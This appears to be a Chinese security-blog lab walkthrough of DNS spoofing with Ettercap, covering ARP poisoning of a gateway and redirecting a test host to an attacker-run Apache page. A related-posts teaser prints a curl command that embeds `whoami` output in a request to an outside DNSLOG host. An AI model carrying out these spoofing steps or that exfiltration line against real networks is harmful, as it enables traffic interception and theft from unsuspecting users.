实战DNS欺骗

DNS(Domain Name System,域名系统)欺骗:

DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。

在kali linux终端输入 ifconfig查看ip地址

-——————–

img

主机:192.168.113.129
要攻击的主机:192.168.113.131
打开Ettercap
利用locate找到文件的位置
Locate etter.conf
文本编辑etter.conf
gedit /etc/ettercap/etter.conf,

img

这里的参数设成0

img

去掉前面的#,也叫作哈希标识,打开Iptables

img

打开ettercap,首先scan forhosts然后打开host list

img

将192.168.113.2设为target2,192.168.113.131设为target1
这里的192.168.113.2是网关,可以用route -n查看

img

img

然后我们转到中间人攻击的选项
选择ARP毒化mitm–ARP Poisoning–sniff remote connections
用于攻击个人以及企业的最常见的网络攻击方式就是中间人攻击(MITM)。作为一种主动窃听攻击方式,中间人攻击方式主要是通过与目标机器建立连接并在目标机器间传递信息来发动攻击。在这种情况下,用户会认为自己正在与另一名用户直接通信,而实际上,通过主机的通信流量正在对用户执行攻击。最终结果是,攻击主机不仅能截取重要信息,而且能够注入数据流来进一步控制受害用户。

-——————–

img

打开plugins 点击DNS欺骗插件dns_sproof来激活它

img

然后进入文本编辑修改etter.dns
终端命令:gedit /etc/ettercap/etter.dns

img

接着跳转到
var文件夹 www文件夹 然后是html文件夹
index.html打开是这样的,我们现在选择文本编辑它

img

img

img

开启apache服务器,这样我们的机子就变成网页服务器了

命令:service apache2 start

img

接下来,在目标主机centos上输入KAIL的IP地址

img

我们可以在ettercap看到,microsoft.com被定位到168.192.113.129

img

相关文章
评论
分享
  • 利用msf生成木马入侵电脑

    介绍:Metasploit (MSF)综合利用工具,集成上千种漏洞利用方式,操作简单易上手。Kali自带的,依赖于postgresql数据库 [ ] 利用msf生成木马 [ ] 投放木马至目标机 [ ] 监听 [ ] 控制,...

    利用msf生成木马入侵电脑
  • msf浏览器自动攻击

    msf浏览器自动攻击 首先查看数据库状态 ,并启动数据库12/etc/init.d/postgresql status/etc/init.d/postgresql start 打开msf:1msfconsole 搜索我们需要的浏览器...

    msf浏览器自动攻击
  • SSRF原理、操作演示及防御

    SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服...

    SSRF原理、操作演示及防御
  • CSRF原理及演示

    CSRF(Crosss Site Request Forgery,跨站请求伪造)是一种网络攻击方式,也被产称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF. CSRF漏洞是因...

    CSRF原理及演示
  • XSS的payload构造及变形

    通常进行XSS脚本攻击时,一般网站都是有防护措施的,比如过滤掉我们script,javascript,或者长度限制等等,这时需要我们对我们的脚本进 行简单的变形,打到我们的目的,下面是我对常见的一些变形的分类,以及部分操作演示1.使用...

    XSS的payload构造及变形
  • XSS漏洞利用和beef使用

    安装好的kail XSS漏洞环境(这里我用的是bWAPP,百度安装即可) 首先打开我们的kail,打开我们的beef工具: q切换到/usr/share/beef-xss或者输入如下代码启动: 1./beef 然后登陆...

    XSS漏洞利用和beef使用
  • 存储型xss-H5页面截取

    环境准备 一个有XSS漏洞的页面,或者搭建一个漏洞平台 注册一个线上的XSS漏洞测试平台(有能力可以自己搭) 1.首先我们需要搭建一个本地的漏洞测试平台,这里我用的事pikachu漏洞平台(https://github.com/...

    存储型xss-H5页面截取
  • 一句话木马及变形

    一句话木马变形 介绍:网站后门,也可以叫做WebShell,黑客在入侵了一个网站后,通常会将一些asp或php文件与网 站服务器WEB目录下正常的网页文件混在一起,使得可以通过使用浏览器来访问这些asp或者php 文件,从而得到一个命...

    一句话木马及变形
  • 文件包含漏洞和PHP伪协议

    文件包含的漏洞形成文件包含就是代码注入的典型代表,PHP的文件包含可以直接执行包含文件的代码,而且包含文件的格式是不受限制的,因此如果我们在包含文件中输入恶意代码,就会导致文件包含漏洞,文件包含漏洞大多可以直接利用获取webshel...

    文件包含漏洞和PHP伪协议
  • DNSLOG在盲注中的使用

    DNSLOG在盲注中的使用0x00 Command Execution i. *nix:12curl http://ip.port.b182oj.ceye.io/`whoami`ping `whoami`.ip.port.b182oj...

    DNSLOG在盲注中的使用
Please check the comment setting in config.yml of hexo-theme-Annie!